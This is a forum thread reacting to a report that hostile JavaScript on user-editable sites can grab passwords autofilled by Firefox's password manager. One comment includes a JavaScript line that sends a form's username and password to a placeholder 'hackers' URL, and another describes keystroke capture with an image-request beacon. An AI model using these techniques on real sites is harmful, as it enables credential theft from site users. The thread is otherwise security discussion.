
Holes Remain Open in Firefox Password Manager

Zonk posted more than 5 years ago | from the batten-down-the-hatches dept.

Security 191

juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"

191 comments

Thank goodness... (1, Funny)

gardyloo (512791) | more than 5 years ago | (#19926513)

... my luggage doesn't run JavaScript.

Re:Thank goodness... (3, Funny)

Opportunist (166417) | more than 5 years ago | (#19926555)

Which brings us back to simplistic password. I mean, you'd be surprised how many people have 1 2 3 4 5 as the key to their luggage. Or their atmosphere shield.

Re:Thank goodness... (2, Interesting)

sci50514 (722502) | more than 5 years ago | (#19927297)

I travel widely. If your luggage is randomly selected by US customs for inspection, they will force open your luggage if they can't open it using the default 0000 password. Good luck when it hits you. I got my luggage damaged a few years ago and a letter stating Homeland Security is not liable for any damage. Now I never set a password on my luggage. There is nothing expensive inside anyway.

Re:Thank goodness... (1, Offtopic)

SatanicPuppy (611928) | more than 5 years ago | (#19927643)

I just stopped carrying luggage. Now when I travel, if I'm forced to fly commercial, I carry a backpack with what I need, and ship the rest.

Homeland security is a bad joke; they only prepare for the least likely attacks...I can't carry a soda on the plane because I may have 50,000 dollars worth of chemistry equipment shoved up my ass which would allow me to manufacture that soda into a bomb? Give me an effing break.

I have to x-ray my shoes because my shoes may explode? Do I look like James Bond? And, insult to injury, they only x-ray the damn things, so if, for example, they were semtex encased in a thin layer of rubber that I was going to detonate with junk stored in my laptop or cell phone, it still wouldn't be caught.

Re:Thank goodness... (0)

Anonymous Coward | more than 5 years ago | (#19927859)

semtex encased in a thin layer of rubber

So, does semtex ignite in fire (I'm not a demolition expert, I dunno)? Because dohs still officially allows you to fly with a book of matches despite the fact there's no legal use of them on board.

At least the shoe thing was something that was tried before (Richard Reid). That the response was to make everyone take off their shoes rather than take away their sources of ignition is sad though.

Firefox no longer safe? (4, Funny)

JamesD_UK (721413) | more than 5 years ago | (#19926559)

That's it, I'm leaving the Internet. Forever.

Re:Firefox no longer safe? (4, Insightful)

dvice_null (981029) | more than 5 years ago | (#19926981)

It is not about safety of the Firefox. It is about safety of websites that allow users to insert Javascript code to their sites. It's like a bank which would allow anyone to step behind the desk and act as an employee of the bank.

But they can only "steal" the passwords of that website. They can't steal all your passwords. So just remember to select different passwords for websites that might allow users to insert Javascript code on the site. So it doesn't matter that much if they manage to steal your passwords.

Or use Noscript as suggested. Or simply don't use such websites, as they clearly don't think much about user's security.

Re:Firefox no longer safe? (3, Insightful)

CastrTroy (595695) | more than 5 years ago | (#19927495)

Which outlines the whole strength of having a password manager. You can have a different password for each website. Without a password manager, it's hard to do this because there are so many sites that require passwords. For my password management, I use passwordsafe [sourceforge.net], because it lets me manage all my passwords, not just ones for websites, and I can put it on a usb memory stick, and carry all my passwords with me.

This brings up another thought. If the websites in question allow users to post javascript, and there happens to be a login section on that page, then couldn't the user posting the script add an onchange or onkeypress event to the username and password fields to capture the username and password, and then forward the information to their server by creating an img element, and having the username and password passed as GET variables appended to the URL of the img src, which is in fact just a php page that stores the username and password in a database. Seems to me that any site that allows people to post executable javascript is just asking for trouble.

I value security, so I'll stick with IE (-1, Troll)

Anonymous Coward | more than 5 years ago | (#19927313)

I've really never seen much reason to install a second, superfluous, browser on my system. Sure, it had tabs, BFD. And now that IE7 is using tabs, it's still not that big a deal.

But really, from a security standpoint, the fewer applications you have installed, the more secure your system is. It's called decreasing your attack surface. And really, given the bloatware reputation of Firefox, they really aren't the bastion of secure computing the FOSSie FUD tries making them out to be.

FOSSies still can't even make teh Lunix secure: heck, they can't even get it to work as well as Windows 95. What on earth makes them think they can make Firefox secure? THAT is the real reason the FOSSies are so desperate for Microsoft to release the Windows source code: the FOSSies have no idea how to implement something as important and complicated (and reliable) as "Plug and Play".

Now personally, I don't really have anything important on my home PC, but I still wouldn't trust my security to Firefox. Why bother? Why risk it? Mozilla already lost once in the marketplace of ideas to Microsoft: Netscape may have been the worst, buggiest browser ever made. People literally ran screaming into Microsoft's arms, crying for joy after switching to IE 3.02 (and saving $50 in the process).

It's just a browser, people. Get a grip. It just opens web pages. This is like the other "software as statement of lifestyle" opinions, like the lusers of OS X and Lunix constantly spew. Nobody cares what software you use, and you aren't getting all up in our collective grills by using teh Lunix. You are just gimping yourself and your career... which actually makes other people happy. One less person to compete with during a job search!

It's evolution baby (1, Insightful)

Anonymous Coward | more than 5 years ago | (#19926561)

Only the brightest survive (e.g. we, who use NoScript).

Re:It's evolution baby (2, Interesting)

janrinok (846318) | more than 5 years ago | (#19926631)

The article and TFS tell me that using NoScript (which I do) means that many Web2 sites no longer function properly. I cannot say that I have ever noticed this - has anybody? Perhaps it only affects the sort of web page that I would not wish to visit...?

Re:It's evolution baby (1)

apathy maybe (922212) | more than 5 years ago | (#19926963)

Many airline websites don't function if you have JavaScript and cookies turned off. Of course, they don't tell you that they need these things, they just silently fail.

Some sites, such as Slashdot and Wikipedia, use JavaScript, but only for extra functionality. You don't actually need it.

Some sites that do require JavaScript actually are kind enough to tell you if you have JavaScript disabled, but there aren't that many that I've noticed.

Re:It's evolution baby (1)

janrinok (846318) | more than 5 years ago | (#19927577)

Thank you, but this I know. That is not quite the same as saying Web2 pages do not work. Neither do Web1 pages if they rely on JavaScript. (http://www.oreillynet.com/pub/a/oreilly/tim/news/2005/09/30/what-is-web-20.html). So this is simply a statement which means that 'if you switch off JavaScript then those pages that need JavaScript will not function correctly'. That's why I have been using NoScript for a long time - it prevents a web site running code on my computer.

Re:It's evolution baby (1)

drinkypoo (153816) | more than 5 years ago | (#19927499)

They don't work properly until you activate scripts. You haven't noticed that pages which require javascript don't work after installing noscript, at least until you do something? It doesn't sound like it's working right to me :P (or you aren't)

stupid features (1, Interesting)

D+iz+a+n+k+Meister (609493) | more than 5 years ago | (#19926569)

I think people really need to have their head examined when it comes to certain features.

Don't want to remember all your passwords? Don't use sites that require passwords.

Do you trust your real life keys to be managed by a third party, then wonder how someone broke in your house without forced entry?

Having something "remember" your passwords defeats the purpose of having passwords.

Re:stupid features (4, Insightful)

dvice_null (981029) | more than 5 years ago | (#19926941)

> Don't want to remember all your passwords? Don't use sites that require passwords.

Or more specifically: Don't use internet. How many webmails do you know that don't use a password? You couldn't even write to Slashdot, except anonymously.

> Do you trust your real life keys to be managed by a third party, then wonder how someone broke in your house without forced entry?

Yes, 3rd party has keys to our home. It is quite common with the apartment houses where I live. It is however quite unlikely that they would steal from us, as they would be number one suspects. So far I have never been robbed by the key holders, nor have I ever heard of a case that someone else had been.

> Having something "remember" your passwords defeats the purpose of having passwords.

Not really. It just makes the password behave more like client certificates that automatically identify client to the server.

Re:stupid features (1)

D+iz+a+n+k+Meister (609493) | more than 5 years ago | (#19927551)

Insightful, huh people?

Look, I like firefox. I am using it right now.

But,

> Not really. It just makes the password behave more like client certificates that automatically identify client to the server.

demonstrates such a lack of understanding, I don't even know where to begin.

No, a password manager doesn't make passwords behave like client certificates. It makes passwords available to javascript.

Please, show me a client certification protocol that makes the full credentials available to insecure parts of the application.

A landlord having duplicate keys is NOT the same thing as having someone manage YOUR OWN PERSONAL COPY of the keys.

It is a stupid feature.

M$ passport is also a stupid feature.

Yeah, managing my /. password in the same place as my banking password is soooo freaking brilliant. The two places deserve equal security.</sarcasm>

Defending stupidity... (0)

Anonymous Coward | more than 5 years ago | (#19927997)

Defending stupidity only makes you look stupid.

If someone can't remember a password, should they really be using a computer? How on earth can anyone function with such a defective brain that they are unable to remember a string of 4-8 characters?

Do they have to tattoo the names of their wife and kids onto them, like in "Memento"?

Re:stupid features (1)

xgr3gx (1068984) | more than 5 years ago | (#19927051)

I agree. Using a password manager makes you lazy and forgetful of your passwords. I used to use one until I tried to login to places on computers other than my own and couldn't remember my login info. That, and when I realized how easily they can be exploited.

Re:stupid features (1)

BrokenHalo (565198) | more than 5 years ago | (#19927621)

Don't want to remember all your passwords? Don't use sites that require passwords.

Not very helpful, perhaps.

But then, I don't allow my browser to remember any passwords that are important to me (by which I mean things like banking or important email accounts).

Less important sites - and yes, Slashdot is one of them - can have passwords stored on my machine, since it's not really the end of the world if they get cracked.

Re:stupid features (1)

Cracked Pottery (947450) | more than 5 years ago | (#19927649)

Some passwords are a nuisance, such as logging onto a free newspaper site. In the case where you are confident about the physical security of your computer, such as a home computer with trusted family members, it's a convenience so long as the system does not possibly provide your passwords to sites other than the true site for which they are used. Bank sites no longer permit authentication with stored passwords.


It doesn't seem difficult to me to just require an authenticated certificate before passwords are presented for SSL sites. This should at least be an option. You can't always protect against foolishness, such as doing business involving money with untrusted sites. I don't want cookies being revealed to any but the site that issued it. These appear to be solvable problems.

Re:stupid features (1)

Peeteriz (821290) | more than 5 years ago | (#19927713)

Well, often I don't decide if I need a password.
Most of these 'remembered' passwords are completely useless to me, just some random site requires that I 'create an account' to, say, view the postings in its forums. And that dumb site then requires '6+ mixed case letters with at least one number', when I would be happy with a blank password - there Firefox remembering this password is a nice thing.

Heck, I wouldn't even want to remember what username I have on these sites, I want it to 'just work' - if my computer wouldn't remember the usernames for me, I'd simply create a new disposable account every time instead of trying to write them down. Remembering it is feasible only if it's a standard username/password that I use on a hundred other sites.

Password Maker plug contained within (1)

Glytch (4881) | more than 5 years ago | (#19927915)

I'd like to plug Password Maker [passwordmaker.org]. It's under the LGPL license. It creates a per-site password using the site's domain name and a passphrase of your choosing as seeds. All the advantages of a password manager, strong passwords, and different passwords for different accounts without actually having to store anything on disk or remembering more than one passphrase. Since by default there's no password stored on disk (and the extension will specifically warn against doing this if you change that setting), there's nothing for password-stealing javascript exploits to get.

Because of the hash that's used, it doesn't work on sites that require alphanumeric passwords, but any site with that idiotic requirement has serious security issues anyway.
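Added example, not PasswordMaker's own code or algorithm: a generic sketch of the idea in the comment above, deriving a per-site password from one master passphrase and the site's domain so that nothing has to be stored. The PBKDF2 parameters, the character set, the salt label and the function names are assumptions chosen for illustration.

```javascript
const crypto = require('node:crypto');

// Assumed output alphabet (75 characters); a real tool would let the user
// adapt it to each site's password rules.
const CHARSET =
  'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&*+-=?@^_';

// Accept a full URL or a bare host name and reduce it to a canonical host,
// so "https://Example.org/login" and "example.org" give the same password.
function normalizeDomain(input) {
  const host = input.includes('://') ? new URL(input).hostname : input;
  return host.trim().toLowerCase().replace(/\.$/, '');
}

// Derive a password for one site. `counter` lets the user rotate the password
// for a single site without changing the master passphrase.
function derivePassword(masterPassphrase, site,
                        { length = 16, iterations = 200000, counter = 1 } = {}) {
  const domain = normalizeDomain(site);
  // The domain acts as the salt: same passphrase, different site, different key.
  const salt = `site-password:v1:${domain}:${counter}`;
  const key = crypto.pbkdf2Sync(
    masterPassphrase.normalize('NFKC'), salt, iterations, 32, 'sha256');

  // Bytes at or above `limit` are discarded so that every character of
  // CHARSET is equally likely (no modulo bias).
  const limit = 256 - (256 % CHARSET.length);
  let out = '';
  for (let block = 0; out.length < length; block++) {
    // Cheap expansion of the expensive PBKDF2 key into as many bytes as needed.
    const stream = crypto.createHmac('sha256', key).update(String(block)).digest();
    for (const byte of stream) {
      if (byte >= limit) continue;
      out += CHARSET[byte % CHARSET.length];
      if (out.length === length) break;
    }
  }
  return out;
}

// Constructed sample inputs.
const SAMPLE_PASSPHRASE = 'correct horse battery staple';
const SAMPLE_SITES = ['https://Example.org/login', 'forum.example.net'];

function demo() {
  return SAMPLE_SITES.map((site) => ({
    site: normalizeDomain(site),
    password: derivePassword(SAMPLE_PASSPHRASE, site),
  }));
}

console.log(demo());
```

Because each domain yields a different value, a password captured on one site does not unlock the others.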

Lies, damned lies (-1, Flamebait)

trifish (826353) | more than 5 years ago | (#19926597)

However, the real problem might not be Firefox' password manager.

I call bullshit. If the "real problem might not be Firefox password manager", then why IE6 and IE7 password managers are not vulnerable?

I know it will hurt all the fanboys, but the less secure browsers are: Firefox, Mozilla, Safari.

Re:Lies, damned lies (1)

hal9000(jr) (316943) | more than 5 years ago | (#19926649)

So before you jump to that conclusion, have you tested this against other browsers?

Not being a developer myself, I don't have an idea about how to fix it, but this seems like an awful sticky technical problem.

Re:Lies, damned lies (1)

janrinok (846318) | more than 5 years ago | (#19926741)

Firefox having a vulnerability in the password manager does not make IE6 and IE7 'more secure' browsers. If it did, then this site (http://www.sans.org/top20/) would not be worth reading....

Re:Lies, damned lies (2, Informative)

Anonymous Coward | more than 5 years ago | (#19926747)

IE is not affected because it doesn't automatically enter the info into the forms on load.

Re:Lies, damned lies (3, Informative)

discord5 (798235) | more than 5 years ago | (#19927087)

I call bullshit. If the "real problem might not be Firefox password manager", then why IE6 and IE7 password managers are not vulnerable?

Actually, the IE6 and IE7 password managers will most likely be equally vulnerable. If you do a little looking at the code, all they really do is just scoop the login and pass from the input fields. Mozilla fills it in by default if only one login is available. I don't know exactly what IE does in this case, but I'm guessing that even if IE doesn't fill out the password right away, you can still add an extra onSubmit to the form and do your thing.

From the MSDN website [microsoft.com] I can quote:

When the AutoComplete feature is set to save passwords, a password is automatically filled in when a known user name is provided, and the password and user name are stored by URL. When changing passwords, the user is prompted to save the new password.

So as far as I can tell, you just need to enter a username and be on the correct URL. If by URL they mean "exactly the same page" this won't work unless you can trick the browser somehow, but if it is "the same (sub)domain" it will. Since I don't have an IE at my disposal right now, I can't test it, but I suppose it will work when you use onSubmit.

document.location="http://some.hackers.url/collect .php?user=" + document.form.user.value + "&pass=" + document.form.pass.value;

Then redirect to the login page hoping that the site doesn't check referrers (most likely they don't), and you're set to go. Sites that allow users to enter HTML and especially javascript are begging for this sort of thing, and there are much worse things you can do once someone gives you free play with javascript anyway (cookies anyone?)

Just stating the obvious, although now I'm actually curious if this works on IE...

Re:Lies, damned lies (2, Interesting)

FLEB (312391) | more than 5 years ago | (#19927139)

It's not even really a browser security issue. Okay, I suppose there could be user-interaction requirements so the form-filler doesn't *automatically* autofill on page load, but the real issue is site-owners who ignore the basic principles of site security and password handling, and open their users up to simple exploits.

The central concept in much of web-client security assumes that a domain is a single entity, and if you trust the domain, you trust the domain entirely. I don't see fault in this assumption-- a line has to be drawn somewhere as to what "one entity" is, and to split it much further would lead to unnecessary hoops and inconveniences. Back in the NetSol-monopoly days before cheap domain names, this point may have been debatable, but at that time there was far less personal information getting passed around by clients, as well.

Nowadays, anyone who is running a service with open access and open-ended "userpages" should be taking the bare-minimum step of sub-domaining their users' pages, and sub-domaining their own login forms as well. It costs nothing, it's more convenient for users, and it sandboxes everyone from each others' potential hack-attacks. If an exploit gets around that, then people can talk, as that'd be a legitimate XSS or trojan/spoofing exploit. This stuff, though, is pinning exploits borne of shoddy web-side security onto the client developers.
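Added example (not part of the comment above and not any site's real code): an audit of a site's URL layout that groups pages by origin, the boundary browsers use for script access, and flags user-editable pages that share an origin with a login form. It also flags cookies whose Domain attribute still reaches user-content subdomains, a gap that sub-domaining alone does not close. The hostnames, the `kind` labels and the cookie records are constructed for illustration.

```javascript
// Constructed layout 1: user pages and the login form on one host.
const sharedHostLayout = [
  { url: 'https://example.org/login', kind: 'login' },
  { url: 'https://example.org/~alice/index.html', kind: 'user-content' },
  { url: 'https://example.org/~bob/guestbook.html', kind: 'user-content' },
];

// Constructed layout 2: login form and each user's pages on separate subdomains.
const subdomainLayout = [
  { url: 'https://login.example.org/', kind: 'login' },
  { url: 'https://alice.users.example.org/index.html', kind: 'user-content' },
  { url: 'https://bob.users.example.org/guestbook.html', kind: 'user-content' },
];

// Group pages by origin (scheme + host + port), as the same-origin policy does.
function groupByOrigin(pages) {
  const groups = new Map();
  for (const page of pages) {
    const origin = new URL(page.url).origin;
    if (!groups.has(origin)) groups.set(origin, []);
    groups.get(origin).push(page);
  }
  return groups;
}

// True when a cookie with this Domain attribute is sent to (and, unless it is
// HttpOnly, readable by scripts on) the given host.
function cookieCoversHost(cookieDomain, host) {
  const domain = cookieDomain.replace(/^\./, '').toLowerCase();
  return host === domain || host.endsWith('.' + domain);
}

function auditLayout(pages, cookies = []) {
  const findings = [];

  // Check 1: a login form and user-editable pages served from one origin.
  for (const [origin, members] of groupByOrigin(pages)) {
    const logins = members.filter((p) => p.kind === 'login');
    const userPages = members.filter((p) => p.kind === 'user-content');
    if (logins.length > 0 && userPages.length > 0) {
      findings.push({
        type: 'shared-origin',
        origin,
        userPages: userPages.map((p) => p.url),
      });
    }
  }

  // Check 2: cookies scoped to a parent domain that includes user-content hosts.
  for (const cookie of cookies) {
    if (!cookie.domain) continue; // host-only cookie: stays on the host that set it
    const exposed = pages
      .filter((p) => p.kind === 'user-content')
      .filter((p) => cookieCoversHost(cookie.domain, new URL(p.url).hostname));
    if (exposed.length > 0) {
      findings.push({
        type: 'cookie-scope',
        cookie: cookie.name,
        userPages: exposed.map((p) => p.url),
      });
    }
  }
  return findings;
}

// Constructed cookie records: one scoped to the parent domain, one host-only.
const wideCookie = { name: 'session', domain: 'example.org' };
const hostOnlyCookie = { name: 'session', domain: null };

console.log(auditLayout(sharedHostLayout));
console.log(auditLayout(subdomainLayout, [wideCookie]));
console.log(auditLayout(subdomainLayout, [hostOnlyCookie]));
```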

Re:Lies, damned lies (1)

drinkypoo (153816) | more than 5 years ago | (#19927443)

I know it will hurt all the fanboys, but the less secure browsers are: Firefox, Mozilla, Safari.

Uh, how does the existence of a specific exploit in Firefox make it a less secure browser than IE?

History disagrees with you.

If you can provide some hard evidence that IE is more secure than Firefox, we would all be interested in seeing it.

But we won't be holding our breath, either, for two reasons: one, there is no such evidence; two, you would probably not be capable of providing it even if it existed.

Re:Lies, damned lies (1)

FiveStarGeneralChaos (1130809) | more than 5 years ago | (#19927543)

Did anyone bother to read the details of this vulnerability?

But this means, that a second, evil page on the same server could steal those saved passwords.


In this case the server has already been compromised to some degree... and the only password in jeopardy is one to the very server you are connected to....
That's like saying a local restaurant is not a safe place to use a credit card.... because the staff might see my credit card number or they might be robbed and have my signature slip stolen...

BTW: Have any IE users actually tested to see that IE doesn't have the same "vulnerability"?

Re:Lies, damned lies (1, Insightful)

Anonymous Coward | more than 5 years ago | (#19927767)

What does Window Snyder have to say now? How many times have we shown you the exploits (and demonstrated fully) and got shot down for it? Well, now that the real exploits are gaining attention (thanks to some clever tactics), we'll see her reaction later. Her constant smartass remarks, and devs hiding certain bug exploits and fixes from the ones that found them in order to save face is just making Mozilla look worse and worse. When you have to rely on third party software to keep Firefox safe now, well, it's starting to sound more like IE now, huh? Please, lets save Mozilla by ridiculing the people in it causing the problems and not allowing change to happen instead of piling bloat over bloat (It's pretty bad when you have such horrible memory leaks in Firefox now).

I am not a Microsoft shill, I support fixing Firefox but the masters don't care.

Re:Lies, damned lies (2, Insightful)

g4sy (694060) | more than 5 years ago | (#19928137)

Fanboy here. You're right. Got that outta the way

The problem is not really with the firefox password manager, because

1. Even if you only automatically entered a password with a push mechanism (right-click to fill in password information) then people would still do that on the "bad" scripts. The problem, like most things, is a problem of social hacking. Education is what is needed... maybe make firefox educational as it's logging into various login pages?

2. Remember the problem boils down to using your fileserver password for your myspace account: that's what this is talking about. It's not like an attacker can read your whole password manager, it can only get the password for a certain site that they have ALREADY compromised (myspace and facebook are sites that are compromised by design). If you use one password for all those inherently insecure sites, and another one for your email, and another one for your banking then this attack, even if successful, will not hurt you as much as you think it would. Oh no! Some script kiddy finally managed to get my facebook password! He might upload pictures... and people would think I have a life.

Possible fix (4, Interesting)

Arthur B. (806360) | more than 5 years ago | (#19926607)

Do not use a pull model but a push model like the bugmenot extension. A right click in the login form would allow you to automatically enter saved information. It's much safer.

Secure Login extension (3, Informative)

David_W (35680) | more than 5 years ago | (#19927195)

Do not use a pull model but a push model like the bugmenot extension.

You know, that's not a bad idea. Apparently someone else had it too. Check out the Secure Login [mozilla.org] extension. It doesn't use a right click (although I kinda wish it did; may have to suggest that) but it does have a shortcut key and an icon.

Thanks for saying that; I would have never thought to go looking for such an extension without you saying it.

Re:Secure Login extension (1)

Arthur B. (806360) | more than 5 years ago | (#19927333)

The nice thing with a contextual menu is that it could provide you with the list of all possible login you have for this website.

Re:Possible fix (1)

discord5 (798235) | more than 5 years ago | (#19927335)

A right click in the login form would allow you to automatically enter saved information. It's much safer.

Actually, it wouldn't. It would prevent this simple javascript "exploit", but you can adjust the tactic for this. Now you would just either wait for the login form to lose focus or to be submitted. Click on the submit button, trigger the onSubmit handler that you can craft because someone was stupid enough to allow users to do javascript, and we're down the same road again.

You should never allow untrusted users to put javascript on your site (and to be on the safe side even HTML).

Re:Possible fix (1)

Arthur B. (806360) | more than 5 years ago | (#19927841)

In the case you describe (user javascript on the same page as the login form) manually entered javascript is also affected... there's not much you can do about that in the browser.

Re:Possible fix (2, Interesting)

m0RpHeus (122706) | more than 5 years ago | (#19927373)

> Do not use a pull model but a push model

That's exactly how Opera's password manager works. You need to click on the Wand button to enter the user name and password on the form fields. And FYI, the security hole does not affect Opera.

password complexity (4, Interesting)

farker haiku (883529) | more than 5 years ago | (#19926657)

I used to think (back in my tech support days) that people who couldn't remember their password were just plain stupid. These days, I work in a large firm that has tons of different passwords for everything. Unix passwords, windows passwords, spam mail setting utility password, time tracking utilities have passwords, passwords are required for clearcase/clearquest, remote login, etc. Each of them has different password complexity rules. I no longer criticize people for forgetting their password.

Re:password complexity (1)

farker haiku (883529) | more than 5 years ago | (#19926693)

I meant to tie that in with the topic... these password managers make life easy. The person that comes up with a secure, non hackable implementation of it will make a fortune.

It's already been done (1)

morgan_greywolf (835522) | more than 5 years ago | (#19926971)

It's already been done, and the result is open source: KeePass [keepass.info]. Unlike other password managers, KeePass stores passwords in a cryptographically-safe database. Passwords are never entered automatically -- you can double click the KeePass password field to copy the password to the clipboard for 10 seconds, and then paste it into Web page's password field. After 10 seconds, the password is automatically removed from the clipboard. Works for more than web pages, too.

Re:It's already been done (0)

Anonymous Coward | more than 5 years ago | (#19928157)

Oh holy shit on a stick. I desperately wanted to believe that this was fake. Desperately. Not even RMS could come up with a name this awful, I told myself. But curiosity got the better of me, and I googled it, and it's for real. Keepass. Keep ass. You aren't fooling anybody with that capitalized P. Keepass. Ass. Asskeep. Is your ass getting out of control? You need Keepass! Keepass is a completely automated solution that will proactively manage your ass for you, leaving you free to get on with your busy day! Order now and get two extra Keepass refill packs, absolutely free!

Re:password complexity (1)

UbuntuDupe (970646) | more than 5 years ago | (#19926847)

I have two credit cards. (Well three, let's start with the two.) Each of them I got from a different credit union. For online access to those cards' accounts, the CU sites send me to ezcardinfo.com. Even though both cards are stored at that site, I have to set up a different username for each site. Then ezcardinfo and my CUs phased in new security measures where I have to also know a picture and a description of that picture for each site. So that means four sites for which I have a username, password, picture, description of a picture, and security questions, even though they could be (and were previously) consolidated to two.

On top of that, I have a third credit card (before you ask, yes I pay the balance on each bill, no interest accrued) that has a different namespace requirement, requiring a different username and password. Add to that my 401k site, my non-work mutual fund site, and my discount brokerage site. (The 401k provider, Fidelity, sucks for mutual funds, and the mutual fund site, Vanguard, sucks for stock purchase.) All with their own security measures.

Clarification (5, Informative)

jojoba_oil (1071932) | more than 5 years ago | (#19926683)

> Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function.

That's very misleading. Allow me to clarify:

Users could also disable JavaScript, which in the age of Web2.0 would cause many pages to display incorrectly. A better alternative is NoScript! [noscript.net], an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.

Re:Clarification (3, Interesting)

Opportunist (166417) | more than 5 years ago | (#19926771)

That's exactly the problem with Web2.0, that NoScript would probably not cut it.

Take MySpace. How do you want to handle it? Whitelist MySpace as a whole? Then you got no security. Whitelist certain user pages? Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.

The problem is not that certain domains are "evil". Ok, that problem exists, too, but it's a very different problem. The problem is that it's now possible to put malicious script code into user generated content, and that other content on the same server and domain is what people want to see.

Re:Clarification (1)

Gregb05 (754217) | more than 5 years ago | (#19926867)

You're not banking with MySpace (I hope)
Generally if a site has some sort of importance, there will be no native AJAX/Javascript/whatever that will interfere with people blocking scripts on the site.
Worst thing that could happen on MySpace is someone puts a terrorist comment, the FBI talks to you and you say that you didn't put it there, and the IP logs will back you up.


I don't think anyone in the world will go into the business of stealing Web2.0 passwords for profit.

Re:Clarification (2, Insightful)

flitty (981864) | more than 5 years ago | (#19926901)

Easy. Don't use Myspace.

Usually my NoScript when blocking Java has a list of about 5 or 6 current sites running scripts (ad-servers and whatnot, ads.google.com comes up on almost every page), and anything other than the trusted site I'm at NEVER gets whitelisted, it's just not worth the risk. It's a hell of a lot better running a crippled 2.0 website than losing control of what's coming into my computer. I don't need to see all your pretty java crap, and a good site doesn't rely on java to display correctly anyway.

Re:Clarification (2, Informative)

jojoba_oil (1071932) | more than 5 years ago | (#19926919)

Then someone who browses userpages has essentially the equivalent of having JS turned off and gets bugged every 2 seconds. And the potential problem that someone might generate content you want to see and bug it.
Gets bugged every 2 seconds? Have you used NoScript? It provides a very minimally intrusive bar along the bottom of the browser stating "NoScript has blocked X number of scripts", and you can even turn that off. And without scripting enabled on a page, how do you expect the page to "bug" users to enable JavaScript? The very best they can do is provide a <noscript> tag asking for it -- and then we'd be assuming the user can make the decision themselves.

Browsing websites such as MySpace works fine without JavaScript -- they want users on their pages, even if their browser doesn't support/enable JavaScript. It is extremely rare that I stumble across a website that I cannot get working. As for user-generated content, that's precisely the reason NoScript! allows you to whitelist specific pages. (Or being that I'm not a dev, perhaps it's just a handy use for that feature).

Please stop spreading FUD and use an extension before you try to knock it.

Firefox password manager (4, Interesting)

wile_e_wonka (934864) | more than 5 years ago | (#19926711)

The thing that scared me away from the password manager in Firefox was a program called System Info for Windows [gtopala.com]. It lists all sorts of things about your computer--click on "Secrets." It searches for passwords in several programs--I have a few passwords saved in FF and the vast majority in Opera. I saw both programs mentioned in its analysis (meaning it searched both FF and Opera for saved passwords). It listed every saved FF password but no Opera passwords.

It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.

Re:Firefox password manager (2, Insightful)

jedidiah (1196) | more than 5 years ago | (#19926745)

You aren't trying to keep it secret from yourself. You're trying to keep it secret from others. At the very least you could run the relevant password saving program in a debugger on your own machine to extract the data in question.

The fact that a program running on your machine as you can read your passwords is only marginally disturbing.

Re:Firefox password manager (1)

jojoba_oil (1071932) | more than 5 years ago | (#19926765)

For your passwords saved in Firefox, do you use a master password?

As far as I know, unless you provide that master password as an external "key" there really isn't any way that Firefox can store your passwords in such a manner to prevent other programs from retrieving them while still able to access them as plain text itself.

Re:Firefox password manager (4, Informative)

Derek Pomery (2028) | more than 5 years ago | (#19926773)

Your first mistake is not setting a master password in Firefox.
Once you do that it won't be able to read them either.
Its failure to read the Opera ones means either A) you set a master password in Opera or B) no one cares about Opera so program doesn't even look for them.

Re:Firefox password manager (1)

wile_e_wonka (934864) | more than 5 years ago | (#19927937)

I don't have a master password in Opera--and the program does look for them (reread my post). Additionally, passwords in Opera are saved in "wand.dat"; if you open this file in a text editor it comes out nonsense. Other Opera .dat files (cookies, history, etc) are readable in a text editor (I notice they are more readable in Wordpad than Notepad), which makes me think Opera isn't just saving these as text. FF passwords appear to be saved in "signons2.txt"--this file opens nicely in notepad or wordpad, and is easily readable--except for the usernames and passwords themselves, which are encrypted.

I find it notable that this little program easily gleans the info from FF while not able to pull password info from Opera (though it does try). Another user said this is no big deal because it's a program running locally on my computer. It seems to me that it's still a security risk because a virus like this program could upload that password information to some criminal. Plus--how do I know this information can't be collected remotely?

Last--FF needs a master password set to be even remotely secure with regard to passwords, while Opera does not. This seems like a big hole.

Re:Firefox password manager (1)

gazbo (517111) | more than 5 years ago | (#19926809)

That really shouldn't come as a surprise. How can the browser supply the password to a site if it's not somewhere on the hard disk waiting to be read? The only sensible way is to encrypt it with a key that the user must enter on browser startup, which most people would find a fucking annoying nag rather than a necessary security feature.

Re:Firefox password manager (1)

p3d0 (42270) | more than 5 years ago | (#19928127)

Or, it could ask for a "master password" when it goes to fill in a password the first time.

WAIT! It already does that!! OMG

Re:Firefox password manager (1)

kebes (861706) | more than 5 years ago | (#19926877)

It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.
Well, any program running with user rights can probably read the firefox passwords, since they are not hard for a user to obtain. Just go into "Options" > "Security" > "Show Passwords..." > "Show Passwords" and click "Yes" on the confirmation dialog. You'll see all the stored passwords in plaintext. This means that your passwords can be read without trouble. For instance anyone who sits down at your computer can check through those and find out what your passwords are.

This kind of password manager is not very secure... but then again the intention here is convenience. The idea is that on computers you "trust" (you are confident that they are physically secured to only trusted people sitting down at them, and you are confident they are not riddled with spyware) then you give up a little bit of security for a good amount of convenience. Of course it goes without saying that you should not be using the same passwords on these unimportant websites (which get stored in your password manager) and important things in your life (e.g. root password on an important server!).

